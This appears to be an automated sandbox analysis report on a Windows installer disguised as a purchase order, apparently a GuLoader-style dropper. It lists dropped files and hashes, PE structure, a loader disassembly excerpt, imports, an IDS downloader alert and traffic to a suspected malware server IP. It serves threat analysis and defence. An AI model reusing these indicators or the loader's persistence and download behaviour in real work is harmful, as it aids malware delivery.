                • Number of executed functions: 47
                • Number of non-executed functions: 298
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: Purchase Order Purchase Order Purchase Order Purchase Order.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                12:11:48API Interceptor3x Sleep call for process: Purchase Order Purchase Order Purchase Order Purchase Order.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.222.57.90NK098765434567890-87654345678.exeGet hashmaliciousNanocoreBrowse
                  NAC0098765434567890-09876.exeGet hashmaliciousNanocoreBrowse
                    RHK098760045678009000.exeGet hashmaliciousNanocoreBrowse
                      FHKPO098765432345.exeGet hashmaliciousRemcosBrowse

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        ROOTLAYERNETNL9dOKGgFNL2.exeGet hashmaliciousRedLineBrowse
                        • 45.137.22.126
                        RFQ List and airflight 2024.pif.exeGet hashmaliciousPureLog StealerBrowse
                        • 45.137.22.174
                        Calyciform.exeGet hashmaliciousGuLoaderBrowse
                        • 45.137.22.248
                        I5pvP0CU6M.exeGet hashmaliciousRedLineBrowse
                        • 45.137.22.248
                        gLsenXDHxP.exeGet hashmaliciousRedLineBrowse
                        • 185.222.58.240
                        DEVIS + FACTURE.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 45.137.22.126
                        PZNfhfaj9O.exeGet hashmaliciousRedLineBrowse
                        • 185.222.58.80
                        ZxS8mP8uE6.exeGet hashmaliciousRedLineBrowse
                        • 45.137.22.123
                        nu28HwzQwC.exeGet hashmaliciousRedLineBrowse
                        • 185.222.58.52
                        DKO6uy1Tia.exeGet hashmaliciousRedLineBrowse
                        • 45.137.22.70

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dllMG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                          Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  SBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                    mU4lYkmS6K.exeGet hashmaliciousCobaltStrikeBrowse
                                      SBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                        mU4lYkmS6K.exeGet hashmaliciousCobaltStrikeBrowse
                                          TouchEn_nxKey_32bit.exeGet hashmaliciousUnknownBrowse

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll

                                            Download File
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):11776
                                            Entropy (8bit):5.890541747176257
                                            Encrypted:false
                                            SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                            MD5:75ED96254FBF894E42058062B4B4F0D1
                                            SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                            SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                            SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 3%
                                            Joe Sandbox View:
                                            • Filename: MG-Docu6800001.exe, Detection: malicious, Browse
                                            • Filename: Fac.exe, Detection: malicious, Browse
                                            • Filename: Factura Honorarios 2024-11-17.exe, Detection: malicious, Browse
                                            • Filename: JOSHHHHHH.exe, Detection: malicious, Browse
                                            • Filename: rCEMG242598.exe, Detection: malicious, Browse
                                            • Filename: SBSLMD5qhm.msi, Detection: malicious, Browse
                                            • Filename: mU4lYkmS6K.exe, Detection: malicious, Browse
                                            • Filename: SBSLMD5qhm.msi, Detection: malicious, Browse
                                            • Filename: mU4lYkmS6K.exe, Detection: malicious, Browse
                                            • Filename: TouchEn_nxKey_32bit.exe, Detection: malicious, Browse
                                            Reputation:moderate, very likely benign file
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Clap\Exoascaceous73.tra

                                            Download File
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):249837
                                            Entropy (8bit):1.2410746997695157
                                            Encrypted:false
                                            SSDEEP:768:d6sbjlB29qJBBoYbES9BCDKXC9HOak6p6MDrQsv8Ajldp8tEcf0TeMhz3CqXuwl7:tf1wx3et4e+lL5WwgzfZTc
                                            MD5:F1A91A75CAAA712680DA4475E1CDA954
                                            SHA1:C341696CBB8AF494821F8D16EA5E30B7827F5393
                                            SHA-256:79C33E51A0D2271F4252D793D8B9BCEF9F1F817FF3E61C94ECC59E615EC68DCE
                                            SHA-512:F43E478ADCCAF2CBD9FF9F2A4F920B63F53A82E028CD5ADFB41896EC04EB626FD15E283CB35D8C4D2A95EA8B5A7E59102A8A306C4DF60375C257A04150616906
                                            Malicious:false
                                            Reputation:low
                                            Preview:......................................................................................................................2......w...........................................................................d..... ........S........................R..............................I..................................................f.................................~....p................-.........\...........................................D..........................7.......................D.........................................."..J....................................................................|U.....W.....................................$.....B.....j..............................R.............................................................-..................G..............=.....................2.........[..'.....H......................u.......]............R........g.........................................................p...................................|..........................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Atomizing.Eft

                                            Download File
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:TTComp archive data, binary, 4K dictionary
                                            Category:dropped
                                            Size (bytes):40687
                                            Entropy (8bit):4.5997894189869815
                                            Encrypted:false
                                            SSDEEP:384:KydpqkEFLRpyBDIag9EJG15JghsD4q3R3TD/FS0v29Akde6QYqOmN3LIV9re3bef:woFgH1EsM8H/UakYEI7I8LLgk4P
                                            MD5:35D47296CFB14E694BC97D22A92D42A1
                                            SHA1:BD0C529FFF26F900DB7948353F87377A31D0890D
                                            SHA-256:52716A62B0CE128607785167F560D0890D4C79CFEF11E677945720D4B691F858
                                            SHA-512:925F88965A2CF617F060E3A5464B8E601C4C5F963FBD955FE35AD7F72759C72E44742486295F51342DB8633600E5F97FF764E0222DD6B53931F93303F9407BE0
                                            Malicious:false
                                            Reputation:low
                                            Preview:........gg.....0..............~~.........mm.2.......==.BB......^^...kk.............NNN...S............L..3............````..WWWW................................................S.................ww...sss.....l.QQQ.......................................v.......i.......U.....................www.7777....................SSS....------......3............ZZZ..qqqqq............2...................5555.............-.......dd..........+....3.6....7............;............!.********.XX............jjj...............IIIIII..............................qqqq.............b..............................V......{...[[[[....[[[......T.....b......z.gg.......pppp....................W...........................KK....v................................................7.B..11...........yyyyy................M.........................LL..................................................%.............Z.5............,,..dd........55..0..~.............b.vvvv..r..........iii...............................''............

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes\vec.jpg

                                            Download File
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 600x600, segment length 16, progressive, precision 8, 337x200, components 1
                                            Category:dropped
                                            Size (bytes):5453
                                            Entropy (8bit):7.8833870423876355
                                            Encrypted:false
                                            SSDEEP:96:Jh/2gZ62nmh8h8hMA8cZZ5wq1dJlH999YqYYYSJ9nv79i2+7nllbx0:j+gZ62nypZsqnJlH999Lv7I7a
                                            MD5:1732F2BFFA1308AABB19AA7006DFE151
                                            SHA1:80974B7DC8AFF2267C3502433C9DBDCCE04BD68C
                                            SHA-256:F99C88579EF1BF9BE2A9442D6E0B61BAC01BE74E9EC96A844D3CE0E49E89B889
                                            SHA-512:9DE1E2D1028E9FC4938CA1A4DE274513632319B411E2E1797DAAC80AD1D8C220ABD410612DDA28B6FA58BAD6A591234A675AEA0AE29B0EF75E9776BE91993C1C
                                            Malicious:false
                                            Reputation:low
                                            Preview:......JFIF.....X.X.....C................................... $.' ",#..(7),01444.'9=82<.342........Q..............................................=.|'......M.R....;n....8y.....@.2Uo........S......'.]"P.{`......8x..1Sd..H...a..3.]......_......?..p....>...>....1.f..n..>A...........5.+tv...c..............}'.b.....O.........^g...5.............5.+s....Z....O.........[....+[.A...........5.+tr...kzh>...>....1.f..n.\......W._......?..p......M.......>....1.f..y...A..I....>....1.f..k.K..}...}....c..g....|.../........k8V..C.._.~.......3Y.Gj.b..94.....3zf&....=..'........Q.,v...I5..!...?}K...~....6.?....p./\...g.O.....9..o.~....7...........................V.67T..1@. 25A..!..03$U&Qa...........g........Hq.`.s....X...n,Y}A..e.......;./..Z...,B1..J{h..F..V...+.O.V....t../G#....D.....Y..\K/.oZ".:....G.n.B......;m6.;.m..p..4....F...h.v.m.w..M.N..i.i.;m6.;.m..p..4....F...h.v.m.w..M.N..i.i.;m6.;.m..p..4....F...h.v.m.w..M.N..i.i.;m6.;.m...a...#..%.wL{G..p=..LNq.+...\J..1

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Underemphasizing70.tio

                                            Download File
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):290718
                                            Entropy (8bit):1.2554775771524807
                                            Encrypted:false
                                            SSDEEP:768:tCp+qklylxDqcoTQYGEujA28gHCxgzdobjCp3zxBMpnz4G+KrbwdmCClgE+JQH0/:+DqcWd2ikx8zkwT0sH7FZJ9dmMg9Fb
                                            MD5:C3ACEFE77EA0A60EFDFBC53EF527E6DD
                                            SHA1:84064B562F74D054254FDC6012E83248F4C10DB2
                                            SHA-256:01AB1D43FD91C8715A0FE5D4D3EA6A4DFD0FF6DCA3BFE95DE026B97DD246260B
                                            SHA-512:01B8D1253A15345F35304860BC91AC0EFE9DFD4AE91022326DD1E509C0CC37BE401DE24AA2096B4C2B17D7B965F904C80ECCDB4157C1FD366FA90226DE198D1E
                                            Malicious:false
                                            Reputation:low
                                            Preview:.........................$................p...................T..............................Z..............................'....................(...............................................................(.Y.................W...........m............6..........................>.........................................................................................................................................c........k.V.................................4.;F..0.........................M..............1...........[4................O......].......&................(.........................................p..................................................................................K....~...................n........................................................................................................................................................Q.......................D..........................)........:.......|.................................).....................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\sulkens.dic

                                            Download File
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):484483
                                            Entropy (8bit):1.2566608257372598
                                            Encrypted:false
                                            SSDEEP:1536:k00wcig7ANvjuzHnVWM5DNgLiOavUv9tkj8:Wwci1O1WABgT92j8
                                            MD5:BDF9F6FA5F7851BD46CFAD3859D1D2CA
                                            SHA1:9352199243642CAD95D4870883238F1E06E3D13D
                                            SHA-256:AF12000C4E3E6C57CE444368D50A3E7F737647C0DECD597AAA307F26C0B1BFBF
                                            SHA-512:A99C33BCB4D65AF35FA970BDB84332FCC7C284C2017F135C81DE28EC4D1867E1F341CB6A0DCD1B254E816DD2D435FC469536F9D8779FB10455BAF6846FE1A625
                                            Malicious:false
                                            Reputation:low
                                            Preview:..................................m........................................d......T..k.:.......0.....t...^............m....................................s..............7.................M................................................................................S......................S.......c..............o...............................].............................................H.............. ......).......................................^..3.....W....}..............................................................\...P...................1...u......&............................*................................................................Z.....L............}.........G.@.V.6...............................................................................A..........................................[....................R..........................s..........-............................i.........................o.........+.........................n....K..g......................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Vedbendens\Hoveddelenes.haa

                                            Download File
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):281853
                                            Entropy (8bit):7.7902641113783515
                                            Encrypted:false
                                            SSDEEP:6144:qv8q7vHyznD3c0MG0KXtSYaAzhtG1CDta+0kLbYMLezAL1T8K8P/k:lKfqbcX/ySYaAbG1QJLkMMALNbEs
                                            MD5:63B84085F6C377FCB26E75EBD1F83BE4
                                            SHA1:6E6A61DCD1CB093FAC560085E5DC384E3F5C3E66
                                            SHA-256:B63205EDDA324ADC71C16D51D5C4169CEBA89794FAEAF1D0F5809AAEFF256840
                                            SHA-512:F4F43853270F28C405C4FD386094058A5FB9138D237411C60B08FCD97AE176414F8049A0626FD9F02C7571EBAE200AB5FDB4C20896E873B0FDEE23443EFF815C
                                            Malicious:false
                                            Reputation:low
                                            Preview:..**..".55........AAA..........p./........................eeeee...................===........................``.......x..................fff........................RRRR.........................\......KKKKKKK..11..........................u.....__...t....********................................M..R.+++............z....................%%.....S........))................8.........................................nnn.\\.....ccccc......555.pppp..""......zzzzz.-............B........^..........................i...........II.......................*...))...k..8..........``..................h.................................M........A.........@@.|..???..........*...........W......}..%.B........................>..O....tt..iiiiii......`...**...................s........oo...$$....^^^^..........SSSSS.Q.__........nn........7.........@@@.................SS.........................5.............__...................III... ..qq...............).....t...PP.................g..GGG..........W.|..,,.....o.......

                                            C:\Windows\Fonts\Gullis.lnk

                                            Download File
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                            Category:dropped
                                            Size (bytes):1434
                                            Entropy (8bit):3.1879819702714474
                                            Encrypted:false
                                            SSDEEP:24:8m7WLgD4/BV02Dejq8wky+pu8wWyjC0ee4jqy:8bgDszhee8w4pu8w3C0eejy
                                            MD5:3E748CD3854E8659E17051729D6DF4EE
                                            SHA1:CB8A77BB37F774F4879FD07B5D7723EA7AD870CE
                                            SHA-256:D1CFCDCB89837792648DC1669AE5F6B1EA4F167B75A16BDE008D98C5278E9F78
                                            SHA-512:319BD36211BF5463C92E3C97C437C14B600FECCD0ABAFBB38BE937160F762BF4D1683F447BFCC6C2CE3C06728118E0011634FD78A7DE36A88B7A8FB1C102C23B
                                            Malicious:false
                                            Reputation:low
                                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................h.u.b.e.r.t.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....t.1...........Printer Shortcuts.T............................................P.r.i.n.t.e.r. .S.h.o.r.t.c.u.t.s... .t.2...........lensaftalerne.sla.T............................................l.e.n.s.a.f.t.a.l.e.r.n.e...s.l.a... ...X.....\.....\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.P.r.i.n.t.e.r. .S.h.o

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.618058158790601
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File size:724'333 bytes
                                            MD5:b9a03fb0c2c7f23a1e4ccb0d79c5053c
                                            SHA1:4d87c4ed89d8b92f2b6849dc6af6a8850f8e5e7c
                                            SHA256:099369eb025c3e23b6669c872ac2572e7bc4ba9200eb4d6318284983ddb78e3f
                                            SHA512:7b39c7eb08b12f947a2f5fb79f91a7c8fb738fa14c2539db55f207754438f5b340d5ae5219ec1ea6861cb72aad32e04d2b701cc6a34c098e0a780db3607be3d2
                                            SSDEEP:12288:d35ol8MJEBhQRtZZbhhLSbWJgU8UFJ6UibZP9/I7TAWWtQnm:d3kJEBORt7b3Oa2Udi9P9yTB0Qnm
                                            TLSH:46F4E061227BCC66F38492B04556E23D8EA6EEC62971C33757F2EF5BB518F723818211
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h.........

                                            File Icon

                                            Icon Hash:7b3b5a7232162613

                                            Static PE Info

                                            General

                                            Entrypoint:0x40338f
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x5A6FED3C [Tue Jan 30 03:57:48 2018 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:b34f154ec913d2d2c435cbd644e91687

                                            Entrypoint Preview

                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push esi
                                            push edi
                                            push 00000020h
                                            pop edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+14h], ebx
                                            mov dword ptr [esp+10h], 0040A2E0h
                                            mov dword ptr [esp+1Ch], ebx
                                            call dword ptr [004080A8h]
                                            call dword ptr [004080A4h]
                                            and eax, BFFFFFFFh
                                            cmp ax, 00000006h
                                            mov dword ptr [00434EECh], eax
                                            je 00007F039D125443h
                                            push ebx
                                            call 00007F039D1286F5h
                                            cmp eax, ebx
                                            je 00007F039D125439h
                                            push 00000C00h
                                            call eax
                                            mov esi, 004082B0h
                                            push esi
                                            call 00007F039D12866Fh
                                            push esi
                                            call dword ptr [00408150h]
                                            lea esi, dword ptr [esi+eax+01h]
                                            cmp byte ptr [esi], 00000000h
                                            jne 00007F039D12541Ch
                                            push 0000000Ah
                                            call 00007F039D1286C8h
                                            push 00000008h
                                            call 00007F039D1286C1h
                                            push 00000006h
                                            mov dword ptr [00434EE4h], eax
                                            call 00007F039D1286B5h
                                            cmp eax, ebx
                                            je 00007F039D125441h
                                            push 0000001Eh
                                            call eax
                                            test eax, eax
                                            je 00007F039D125439h
                                            or byte ptr [00434EEFh], 00000040h
                                            push ebp
                                            call dword ptr [00408044h]
                                            push ebx
                                            call dword ptr [004082A0h]
                                            mov dword ptr [00434FB8h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 000002B4h
                                            push eax
                                            push ebx
                                            push 0042B208h
                                            call dword ptr [00408188h]
                                            push 0040A2C8h

                                            Rich Headers

                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x308e8.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x66270x68008c030dfed318c62753a7b0d60218279bFalse0.6642503004807693data6.452235553722483IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x80000x149a0x1600966a3835fd2d9407261ae78460c26dccFalse0.43803267045454547data5.007075185851696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xa0000x2aff80x600939516377e7577b622eb1ffdc4b5db4aFalse0.517578125data4.03532418489749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata0x350000x2e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x630000x308e80x30a00f3073287865b6dba616e9c916f34371aFalse0.4013245099614396data5.74891499046254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_BITMAP0x633e80x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                            RT_ICON0x637500x10a00Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.25190906954887216
                                            RT_ICON0x741500x9600Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.2941666666666667
                                            RT_ICON0x7d7500x7600PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9859970868644068
                                            RT_ICON0x84d500x5600Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.309093386627907
                                            RT_ICON0x8a3500x4400Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.35167738970588236
                                            RT_ICON0x8e7500x2600Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.38003700657894735
                                            RT_ICON0x90d500x1200Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4377170138888889
                                            RT_ICON0x91f500xa00Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.508203125
                                            RT_ICON0x929500x600Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4524739583333333
                                            RT_DIALOG0x92f500x144dataEnglishUnited States0.5216049382716049
                                            RT_DIALOG0x930980x13cdataEnglishUnited States0.5506329113924051
                                            RT_DIALOG0x931d80x100dataEnglishUnited States0.5234375
                                            RT_DIALOG0x932d80x11cdataEnglishUnited States0.6056338028169014
                                            RT_DIALOG0x933f80xc4dataEnglishUnited States0.5918367346938775
                                            RT_DIALOG0x934c00x60dataEnglishUnited States0.7291666666666666
                                            RT_GROUP_ICON0x935200x84dataEnglishUnited States0.7803030303030303
                                            RT_MANIFEST0x935a80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                            Imports

                                            DLLImport
                                            KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                            USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                            SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                            ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-11-18T18:11:16.708256+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849711185.222.57.9080TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 18, 2024 18:11:15.518429041 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:15.523570061 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:15.523704052 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:15.523874044 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:15.528654099 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.708092928 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.708117962 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.708144903 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.708256006 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.708380938 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.708395958 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.708466053 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:16.708832979 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:16.708849907 CET8049711185.222.57.90192.168.2.8
